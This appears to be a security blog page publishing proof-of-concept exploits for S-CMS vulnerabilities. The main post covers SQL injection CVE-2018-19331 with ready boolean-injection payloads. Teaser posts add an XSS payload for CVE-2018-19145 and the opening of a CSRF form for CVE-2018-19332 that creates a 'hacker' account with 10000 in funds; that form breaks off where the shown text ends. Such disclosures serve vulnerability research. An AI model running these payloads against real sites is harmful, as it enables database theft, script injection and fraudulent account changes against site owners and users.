Skip to main content

The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page:

location: S-CMS/search.php line 155

Vulnerable code:  $sql="select * from SL_text where (T_title like '%".$keyword."%' or T_content like '%".$keyword."%' ) order by T_id desc";

%' AND 1=1 AND '%'='

%' AND 1=2 AND '%'='

Attacker can add sql statement in the between of both "and" to query the database.


Popular posts from this blog

The POC of S-CMS(Xss) -CVE-2018-19145

Download page:

location: S-CMS/search.php   line144

Vulnerable code:  <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>">

Exp: "><script>(1)</script>

The POC of S-CMS(CSRF)-CVE-2018-19332

Download page:

<!DOCTYPE html>
    <meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
<center><h1>fake request</center>
    <form action="" name="form" method="post" role="form">
    <input type="hidden" name="M_login" value="hacker">
    <input type="hidden" name="M_pwd" value="hacker">
    <input type="hidden" name="M_money" value="10000">
    <input type="hidden" name="M_fen" value="0">
    <input type="hidden" name="M_name" value="1">
    <input type="hidden…